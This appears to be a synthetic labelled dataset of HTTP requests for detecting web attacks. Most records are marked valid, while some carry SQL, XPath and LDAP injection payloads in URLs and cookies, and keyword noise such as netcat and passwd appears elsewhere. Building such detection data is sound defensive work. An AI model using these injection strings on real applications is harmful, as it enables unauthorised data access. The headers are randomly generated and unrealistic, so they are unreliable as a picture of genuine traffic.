Accept-Charset: *;q=0.7
Accept-Encoding: gzip, deflate, compress;q=0.8, deflate;q=0.1
Accept-Language: orsts-selonm;q=0.5, fNnat-s, hise-asHeo, Yehtnft-am2Q
Cache-Control: no-store
Client-ip: 179.176.204.119
Cookie: OiVgr=24;ovo2hrusn=autoexecinsert=;tcdlts3=eKqG;-child.raY7=et 1ootEwteSa|E;j1eF92CoNR2M= ae6 symo;iorte=9binstt\:cesr<i
Cookie2: $Version="69"
Date: Sat, 20 Sep 08 19:37:39 GMT
ETag: "H@VzeDF5Q7kyYecEMGQM"
Expect: 100-continue
From: eead@01e8oq1.gov
If-Modified-Since: Tue, 24 Feb 09 11:56:31 CET
If-Unmodified-Since: Wed, 21 Mar 07 01:36:21 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Jan 07 05:20:29 CET
Max-Forwards: 6
MIME-Version: 7.8
Pragma: u7=a2uhz
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: Shrk9u dreYDeos=vvtke
Range: 901-,219-,-83
Referer: http://Aued.it/oalusf/peqeeulw/voSt7e/jett.nsf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (compatible; Fwe7zetE; SunOS sun4u; sidjtrce)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5717x5114
Via: 5.7 86.102.251.245
Transfer-Encoding: identity
Upgrade: da2wHl/3.4, ndo/3.7, pReoct/8.9, s4knn1/0.1
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3139
Start - Id: 6258
class: Valid
POST /aalfekbreoait/raa/f2Ro074d68Tp/tQbccNgo/zl/8.kNJNLf/oEoqOc6vzR1sC/t3P8txf0AU0sMq/enesnrtnYon6t/xeadkeaarosy/vx/h3W6-3hk.cfm? HTTP/1.0
Content-Length: 225
Content-Language: t
Content-Encoding: gzip
Content-Location: /dchy/aIon5s/onAenr.rar
Content-MD5: aG5lZWJlT2N0YW9wcGVybA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 23:22:15 CET
Last-Modified: Wed, 11 Oct 06 22:13:34 CET
Host: 92.177.148.206
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: zr7fn9x='E2naheAo'
Client-ip: 157.21.100.224
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="47"
Date: Thu, 09 Sep 04 21:27:19 CET
ETag: W/"lOSQGp7vOsjCtnp"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 29 Dec 07 04:08:38 GMT
If-Unmodified-Since: Sat, 21 Jan 06 19:42:35 UTC
If-Match: *
If-None-Match: *
If-Range: "38WOfpIo_UE@WT6-s0"
Max-Forwards: 2612
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.zela.st/1WrnB/mtdtwe/iaqnyt/yrof/oSta1uHi.pdf
Authorization: 7fnwt eatlI=evAengaa
Range: 3-853722,-06527
Referer: http://www.n5id1S.gov/aVenatu/rudg.jpg
TE: deflate;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.2 (compatible; satiafb; Unix; ii9amrSo; vOnd)
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0276x3141
Via: FTP/8.4 www.yrsen.html, 5.4 www.k7taa.png, 3.7 www.audlaa.jpg:9
Transfer-Encoding: deflate
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 140 www.ner7.gif:28 "tvurexwIb0Sdxnss3ae" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hGdrslwaeha=2582784709&esalptA=Doh0EIo&pere0pr6m=2&3dd=ewwE1svxc87P&tbtrebcCopnhD=5&19tksCfz=rwp- rt]ec&5Z3jK5y3VTD=1570631&Naphanijl=312816&iwrRnrfe4eaark=jttvtt&ee0o90Thxn=09067&gojoau8dnc=i5hao&Ktelnet0rDRKU.6=r9twld08sl

End - Id: 6258
Start - Id: 20755
class: Valid
GET /hf_ujSn/xeaazxhj1rncsyyDatfy/dPFTBLxB.JeyZWd3v7/tmvosdyugae2A/yst2mrr6otiiko.exe?it0a3s=toauimgsbohtfl&hDc6XthjSnoeoz=io_&oscttiieo=e%25t%5C%3E&eaaH=ugrMlhtpass%28f2niEei&eo=597071&0@GqUU.=fF4X%40ey&912=yeAdeletee&shutdownC6Q=i6Z5Q-b4xsQL&lnahoqdIenaugEo=bpsnbt HTTP/1.1
Host: www.iuila.de
Connection: close
Accept: audio/*;q=0.2, video/*, video/*;q=0.6
Accept-Charset: x-mac-roman;q=0.3, us-ascii;q=0.5
Accept-Encoding: compress;q=0.6, deflate, compress, compress;q=0.9
Accept-Language: aTs-eit, tNub5ojn-doawdnps, mJor-48tse3;q=0.7, Ieljf5-umDmT;q=0.1, gGnzb-se4n;q=0.0
Cache-Control: only-if-cached
Client-ip: 160.200.75.96
Cookie: -selectwRYOacceptB=2tsimaeattuoenaaCr;hosthl=5stdinwlosee;ucmdHIWYeV=4;t8zbottuit6tk=4043
Cookie2: $Version="82"
Date: Sat, 07 Oct 06 19:50:37 CET
ETag: W/"32r7hQgjXnRa3zv"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Fri, 18 Jul 08 08:37:37 UTC
If-Unmodified-Since: Fri, 08 Feb 08 11:29:02 UTC
If-Match: *
If-None-Match: "Q3sOMl@NOeJb4TW"
If-Range: Sat, 17 Jan 09 18:35:44 UTC
Max-Forwards: 18
MIME-Version: 6.1
Pragma: t=olocou
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: Basic TzlOZWpZcjpqZWVvVHQ=
Range: 802086-,4327-
Referer: http://eei2.org/hi2a/1mneygt/nytr/spe8ak.mpeg
TE: deflate,trailers
Trailer: Expect
User-Agent: oMJTuK4F http://www.efws9wtx.net
UA-CPU: StrongARM
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2236x546
Via: 1.6 17.235.42.106, 4.6 www.Noahsst.jpg
Transfer-Encoding: identity
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 716222532954
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20755
Start - Id: 10279
class: Valid
GET /jjoGnXhJHn.y9LIf4/nIbl7iwW9tnatk/netcatMt7R5X/Itleharbohd/juqu_XwmWsE/R6/iG2tsof/mg.bNG52like/1_@asi/hcG8mQj-0kEB@grfO@7.msf? HTTP/1.0
Host: www.eenlexmnk.de:55
Connection: t7itt
Accept: */*
Accept-Charset: big5, euc-cn, koi8-r, iso-8859-9
Accept-Encoding: 
Accept-Language: a-estmrt;q=0.8, ersosea-Naljeu;q=0.4, reo0-ot;q=0.2
Cache-Control: no-transform
Client-ip: 197.186.92.237
Cookie: z6rh=ceoapitphptsobieormi;bmira2si=r;ntep7=08544439;-uAidWvtc=httpssr
Cookie2: $Version="28"
Date: Fri, 02 May 08 21:40:04 GMT
ETag: W/"BJB3a17I6TQaGm7Q749"
Expect: 100-continue
From: yeiwtd@pnstn5nxr.com
If-Modified-Since: Mon, 19 Nov 07 08:11:01 GMT
If-Unmodified-Since: Sun, 12 Jul 09 21:27:11 GMT
If-Match: *
If-None-Match: "toaSjR4pqjyLKH1ML"
If-Range: *
Max-Forwards: 96
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="et2etr"
Authorization: Digest opaque="aErocc0"
Range: 12-5596
Referer: /m1hoa/hieeb.php3
TE: trailers
Trailer: If-Range
User-Agent: wsaslhmu (b9Oa5s; uey1sys; iUB43O; o9vWTCO; jQmPVWVa5)
UA-CPU: StrongARM
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 032x7737
Via: wwi7nt/3.8 www.E1sir.css
Transfer-Encoding: identity
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 634 16.238.124.149 "sa9ongsw5ehotu5nns1i" "Wed, 15 Feb 06 17:28:54 CET"
X-Forwarded-For: 205.147.122.108
X-Serial-Number: 2161344107143
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10279
Start - Id: 34665
class: Valid
PUT /evvbErYiframermKdNmW/c5zwQ62AYp/tCi@M5Z/1srzyV/ewdjjtifte3/wkMjeH7rEF/9X/tVZoHL/D2allUIhttpsvadminFU1V.nsf? HTTP/1.1
Content-Length: 11
Content-Language: icdnbr,qopk,o3iabe
Content-Encoding: deflate
Content-Location: /mtnlit/aq9ciAaY/cbro.jpg
Content-MD5: bWlvOG5laWxiZnNucnNTRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 12:03:43 CET
Last-Modified: Sun, 18 Nov 07 14:10:55 CET
Host: www.nsvbi.cz
Connection: eejet4m
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 120.36.171.34
Cookie: enar=7217628;herlshvsnr=yntde
Cookie2: $Version="20"
Date: Mon, 24 Apr 06 23:39:46 UTC
ETag: W/"jCZVPOgYrE4zGAxr"
Expect: tTsresbs
From: ollao@ehcaufe.uk
If-Modified-Since: Wed, 21 Apr 10 18:54:44 GMT
If-Unmodified-Since: Thu, 19 Jul 07 14:07:52 UTC
If-Match: "@P@qWYOs-NVfsp_gTyh"
If-None-Match: *
If-Range: "0lhO0lKA7VotYzAt"
Max-Forwards: 470
MIME-Version: 8.8
Pragma: an='uj9o'
Proxy-Authorization: Digest response="41b538e6f0bdCAb1964e2d58319d8cFC"
Authorization: NTLM bjVkeGhhYWFsaWdhc0NkZXRybnRlNXVpQTJhbVRpc3RhMWpyTm5jaXRy
Range: 6731-788,3496-,826-
Referer: /0tia5ez/au9le/dzaed.swf
TE: trailers,gzip;q=0.9,deflate
Trailer: Connection
User-Agent: Mozilla/9.4 (compatible; MSIE 3.0; Solaris; tora; yems; tsa4o2)
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0894x8053
Via: 7.7 60.230.63.110:6, HTTP/7.3 www.TSjlTisu.tiff
Transfer-Encoding: identity
Upgrade: Pxo/5.2, ieHso/7.8
Warning: 119 185.151.217.148 "eeihh" "Wed, 04 Feb 09 09:01:27 GMT"
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

8rayTies=eO

End - Id: 34665
Start - Id: 41774
class: SqlInjection
GET /PKoty/eigsea/m3eW6wy72wi9/admp/orianwsdTiient/Ts24gtceeuekR/abifiHm3jnaeleyytdv/eseibTrdn0/d-FQ.N/Wselect/hopBo7VSP/5e1utdu0d.htm?pcBuHutTtUsnkoo=sOTREMk&Y8hg=5dge%40doze&oIyeurs6RnN4Smz=%27+++OR+++%27e4Te%27+++++%3C++++%27X HTTP/1.1
Host: www.ylestoSut3.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, windows-874;q=0.6
Accept-Encoding: identity
Accept-Language: hot-ssty, i-c97noxx
Cache-Control: no-store
Client-ip: 45.62.0.134
Cookie: bfb7skgae3=selectEuD
Cookie2: $Version="958"
Date: Sun, 24 Oct 04 13:09:50 GMT
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 09 Jun 05 06:21:36 UTC
If-Unmodified-Since: Thu, 14 Jul 05 14:53:11 GMT
If-Match: "37YYD@TYqoGCADJXMEl"
If-None-Match: "fA_PoQJEo8bh2E0NUI4"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.1
Pragma: 4flri3=s
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: NTLM MGxuN2h3T3JkcmRjNm9ubGNuQ2lpb2Vyc241dHRub2RzbA==
Range: 4745-5836
Referer: http://www.eaahdhWs.biz/oraio/8e5nR/t7Suge0/eDeceyOj/vtnuc.sh
TE: trailers
Trailer: Upgrade
User-Agent: coaisso/4.7.3.5.6
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ndao/2.1, s0t/9.9, sturte/9.3, ttin7e/5.5
Warning: 049 www.aefei.js:6 "teqln" "Mon, 08 Feb 10 13:37:48 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41774
Start - Id: 23459
class: Valid
GET /26sey3MFNp376_Rrnq/srlarjbmygsstytYuea/Ctl/NpasswdACrfv0QDlsam/ibEjSYfyTT9slk/co97dD@HQ3k.mspx?L28CKNmsystem=w7h%5DP&obnoGoo59srtisa=tN7lTF&gkoE@netcat87V=5sree&ecicv8eoinar=rtP7blSDL&nelxZcdnl=nck&ilooroOisrehc=ioe HTTP/1.1
Host: 87.247.132.247:8390
Connection: close
Accept: image/png;q=0.3, text/html, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 146.86.154.88
Cookie: hdItGo=leutnonsM5egStslo;cei2=8QoAEAttent
Cookie2: $Version="551"
Date: Thu, 16 Jun 05 24:29:54 CET
ETag: W/"-fuUBF2aEQBbYVph"
Expect: hpvhc6=idelr;raox
From: tocfie@tta6.cz
If-Modified-Since: Thu, 30 Dec 04 07:10:39 UTC
If-Unmodified-Since: Wed, 18 Jul 07 17:41:48 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Jan 09 18:23:23 GMT
Max-Forwards: 5662
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2F0cHVpaWZzbGE0YXNkdDRQSG1lbm5oaGcyZXdzRGV6dHRSYTlybDNydG9ueTY=
Authorization: Digest algorithm=MD5
Range: 19-29961,-41
Referer: /nrk2r/otnlde/jcozah.js
TE: trailers
Trailer: From
User-Agent: oqzoSstZieamJa
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 543x2792
Via: 9.3 155.249.85.151, FTP/9.1 254.38.223.155, 8.6 96.58.57.26
Transfer-Encoding: deflate
Upgrade: roe/8.9, root/1.9
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23459
Start - Id: 50087
class: XPathInjection
POST /l7rj.wXa-S/OZMKhL86/Jvar13opassthru9services_Ksock_streamP_CO/zAdbnzvh7/eWeakFYdb0BRvsuvmxSk/ERdsTRr7vnphi5smTn/3csi2sz/iB/t9/9J4bhw87j6nmCvf6OxJ/stu9tXzS_EOu.jpeg? HTTP/1.1
Content-Length: 152
Content-Language: t
Content-Encoding: deflate
Content-Location: /7roh/rmqsosut.msf
Content-MD5: Ym1zdm9yZXNoZWlhYWhwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Mar 06 22:54:58 UTC
Last-Modified: Thu, 17 Jan 08 14:12:21 CET
Host: www.gLzo.it
Connection: pepe0
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.4, iso-8859-7;q=0.0, x-mac-turkish, shift_jis;q=0.5, iso-8859-15
Accept-Encoding: deflate;q=0.4, compress, gzip
Accept-Language: i-hondeHae;q=0.2, hrcr-sret
Cache-Control: max-age=493
Client-ip: 105.22.212.218
Cookie: 1teesl6si2uu1=2htpass;k5E6Q=Idne'  or  (i     <   count(tis/child::text())     and    j     <    count(dsrd/child::comment())     and k <     count(gnvlg/child::*) )   or 't57ne'  =   '   ne'  or;6eDLJxLHG=qi1;Zr0unns=8rihqyoxpann
Cookie2: $Version="79"
Date: Fri, 18 Jun 04 23:06:23 UTC
ETag: "sE0Gym508QYRsKc"
Expect: tsaihsay
If-Modified-Since: Thu, 20 Jul 06 12:31:40 CET
If-Unmodified-Since: Wed, 19 Jan 05 17:22:40 CET
If-Match: "2ANPKkNcx_IoU-HqaoTY"
If-None-Match: *
If-Range: *
Max-Forwards: 205
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dGlydHdkZnFpaGVpdGVjeW5qYWxlZWNvZWVlc3Z0ZG5hYnRJc2Q=
Authorization: NTLM N0loa2lpeHRudGVGY241TnJyYWVhc2luZGhrNG9nbWRhbDBoODlyb3Ni
Range: -467,-6288,-16
Referer: http://www.rtneEb.it/5hoo/msmnyBd/tttle/5itea/MeOvh1u4.mdb
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: qicqua (ssg521Rp; aTHOj2; gfoOJasROP; 7U7sHL.8U)
UA-CPU: x86
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4253x311
Via: 2.7 110.101.13.1:82998, HTTP/6.3 196.81.105.29, 3.0 67.72.54.36:3
Transfer-Encoding: identity
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmz7saniaT=038&5weOehifdesoet1=05305&t6ntwiisr5stt=aa&2schhneadrl6O=0&6J6_yIk=48056148&e6trne7R6A=73701&i6r=lta&5q=7access_log$e&aooeatg5=methbmtual9i

End - Id: 50087
Start - Id: 4187
class: Valid
POST /dEm/0WijP0gJO/m39TTRx/eJ4SFy2RBMaOZqRsl/qZeglb6zxT1/4CL/eeoa9m5bhobrre/7mmi/riwo/reme8qqvew.php3? HTTP/1.1
Content-Length: 191
Content-Language: 6,54aepp5
Content-Encoding: deflate
Content-Location: /aUres/uObcdpk/v6dSfial/uo9yOoo.php
Content-MD5: cmNsYmpkeTZpZDVNZW96Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Aug 07 21:36:31 UTC
Last-Modified: Mon, 20 Jun 05 03:09:14 GMT
Host: www.elhs.it:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 41.163.178.133
Cookie: cwn8niTaE= m?tt534SL+
Cookie2: $Version="908"
Date: Thu, 12 Jul 07 12:37:36 UTC
ETag: W/"Xgxu6V2es.OOZX.Oc"
Expect: 6xsMd
From: aamse8@eaazpr.org
If-Modified-Since: Sun, 11 Jan 04 18:44:13 CET
If-Unmodified-Since: Tue, 20 Nov 07 11:47:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 8.9
Pragma: H='rr'
Proxy-Authorization: NTLM dG50MDJhc3RyZFloY25leXRlU2Fqc3RoZjZhckdLdGphaXd0NzRjZWlhcng=
Authorization: Digest uri=/efehhae/ttd7/1hngzU/aecdGstl.wmn
Range: 6-,-5947,21-
Referer: http://www.gfotpTno.uk/nd0i0/itniroon/nYsaIOet/TdqvoOi.pl
TE: trailers,trailers,deflate
Trailer: Referer
User-Agent: Mozilla/3.9 (Windows; U; WinNT 7.3; mm-cS; rv:6.1.2) Gecko/33737032
UA-CPU: x86
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 878x990
Via: 0.1 www.eg5tna9.js
Transfer-Encoding: identity
Upgrade: tIxs/2.9, corczi/8.6
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uUXa_i=sbsmi~emeSpnetr&abztrnr=uebweentlie&S7ritwmUL=t&oevtC=;r5http&iiA9oiyaoIrhb=9460&nym1S=08&8ejEO=eea tt&Ipqhjrir=3157822386&seos4havaiwsnel=v@ZE8bTT9Vqd&67_1j77aD=6788&IicA=atctie

End - Id: 4187
Start - Id: 38956
class: LdapInjection
GET /fi4/aYT2xIuuL/roVW7C4xxiRjt6__c/O8-metaN.jpg?ohc=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 5.193.126.223:80
Connection: nveo4
Accept: audio/basic;q=0.6, image/*;q=0.0, application/*;q=0.1
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="965"
Date: Mon, 13 Sep 04 11:24:31 CET
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Sat, 01 Jan 05 23:02:48 GMT
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: Sat, 26 Feb 05 08:44:17 CET
Max-Forwards: 2008
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Digest opaque="Ehnf"
Range: 678-706492,70758-,6439-
Referer: /adIl/miTh/ixie.mp3
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 8.0; ll-iz; rv:2.3.5) Gecko/28510295
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38956
Start - Id: 30602
class: Valid
GET /0yAqd8Pi/plnN.tiff? HTTP/1.1
Host: 24.217.1.76
Connection: uaofh
Accept: text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 241.78.217.213
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="6"
Date: Wed, 12 Nov 08 05:56:48 GMT
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: e3Is@usLinCntt5.it
If-Modified-Since: Sun, 28 Mar 04 13:30:30 CET
If-Unmodified-Since: Tue, 11 Sep 07 06:42:09 UTC
If-Match: "3pp4afNTooYP_cTP"
If-None-Match: "8QHAP_Ee2MTKDar"
If-Range: Fri, 03 Dec 04 12:07:23 UTC
Max-Forwards: 3
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: 8Derm dt4seT=4Let3
Authorization: Digest algorithm=MD5
Range: -07588
Referer: /1nAnh.php3
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.3 (compatible; MSIE 7.5; SunOS sun4u; nutmme; b4qlbsse)
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9301x810
Via: 9.1 www.lcs9s.jpeg
Transfer-Encoding: deflate
Upgrade: r2h/2.9
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 147.151.22.151
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30602
Start - Id: 13044
class: Valid
GET /Ergtuiaes0rgttw5F/lanacyeopmnpaov/FluiejiOuioetlsrefae/ahVl_Kk._Uf3/rrMD/eUXLF0.9D/8kAIYThU.VhqW_ulm/ns5arnbrp5So.html? HTTP/1.0
Host: 1.108.38.197:80
Connection: echixed
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.7, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 197.209.45.224
Cookie: epgohQanHdc=werd t ohCdH;f1ofygenh=haiwaxmd;4cotrns=e3aomerttI2eedy;hgq=eqz..3V
Cookie2: $Version="1"
Date: Wed, 20 Apr 05 24:53:57 UTC
ETag: W/"PiPH2rdBqMW0QFVZ"
Expect: 100-continue
From: isn1r@lopp9e.fr
If-Modified-Since: Thu, 06 Oct 05 22:03:23 UTC
If-Unmodified-Since: Mon, 26 Apr 10 15:45:25 CET
If-Match: "ib9K.zZZ09sOm4jv"
If-None-Match: *
If-Range: Mon, 27 Feb 06 08:19:43 CET
Max-Forwards: 6
MIME-Version: 8.1
Pragma: lt=esrj
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Basic dHR4ZDpvNmZobXRyZQ==
Range: 309-6,-2
Referer: /RfdDl/dinr/enSrfs/veto/n4a789.jpeg
TE: gzip,trailers,chunked;q=0.2
Trailer: Warning
User-Agent: Mozilla/0.5 (X11; U; Open BSD i386 0.6; zs-hw; rv:6.3.3) Gecko/61383383
UA-CPU: x86
UA-Disp: 140,798,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 011x9947
Via: HTTP/4.0 65.224.60.177, gn6h/0.7 159.188.176.185
Transfer-Encoding: odveoY
Upgrade: uede/9.7
Warning: 652 138.93.253.43 "apimlrrynaOtM" 
X-Forwarded-For: 248.151.221.242
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13044
Start - Id: 38566
class: LdapInjection
GET /V.LGQ1Ax_/0trtie9cDofehaFfds/dsfeieryeg/rq4O/r.oJ0vTniMN@Kp/Ddetwu5ndojiMsmul7n/4KL8from/dyVIC2QccBHOarI26/prm6ihqieme/sshsdbis4eyih/4bL4P.php?izt6gnbs=you%3Eertuju5&se3wua8zse2asc=%29++++%28++%7C+%28++++cn%3D*o%27brien*++%29%28mail+++%3D*o+%27brien*+++%29+++&tuspooo4nrir=2AF&cyoeeniTmeq=2&nrse5ta=ttaonhihSahteo&w2toiee=3799&xeaoue=et&haTwynuoaaqrgg=bncirhe&yfiteh=idhu%2Boeul&e5cpetnmtea=vsxooIS87v&eiieeo3wrs=klXf-Z&nInhtyHhe=hr2ihtrcws&drqpsdtonbse=fim%5CU+httpsg+4aq%7C31oehAd HTTP/1.0
Host: www.eb7pua93pn.com:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 8o9pRntd-dT, iorciYp-hoe3xe8y, sildhHum-a5ehaint;q=0.4, sstuho-e;q=0.5
Cache-Control: no-cache
Client-ip: 164.121.66.240
Cookie: gostoo2=r3trari90o6g
Cookie2: $Version="55"
Date: Tue, 18 Mar 08 08:29:11 CET
ETag: "Xn6bLNl6HcqYn2A"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Tue, 01 Nov 05 07:38:10 GMT
If-Unmodified-Since: Thu, 17 Feb 05 13:10:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: Basic c05laWdkaDpyZWRl
Range: -5
Referer: /sgee/isgIae/fnekg/shsoee.jsp
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/9.6 (X11; U; Unix 1.5; ha-fd; rv:4.5.3) Gecko/42938883
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6483x132
Via: FTP/8.9 117.115.247.103, HTTP/6.4 147.250.225.235
Transfer-Encoding: gzip
Upgrade: iintzo/8.2
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38566
Start - Id: 34557
class: Valid
POST /e_QzC/vs7/SIservicesBY8/aetisnd/nhgtserA/oiad/f_p6rTvc.Y-.GG/x8hAi5VUcI6XIiObBg/McakMa/pOyIbueATLMdZ-dw@WH.bin? HTTP/1.0
Content-Length: 36
Content-Language: ysn,sgnt
Content-Encoding: identity
Content-Location: /h5tespd/aosc/txDmk/SSdntX/aeentec.jsp
Content-MD5: ZW9maTNyZW96YXJueWg0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Dec 09 10:15:51 UTC
Last-Modified: Sun, 16 Dec 07 24:05:32 CET
Host: 163.147.237.249:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 71.183.190.111
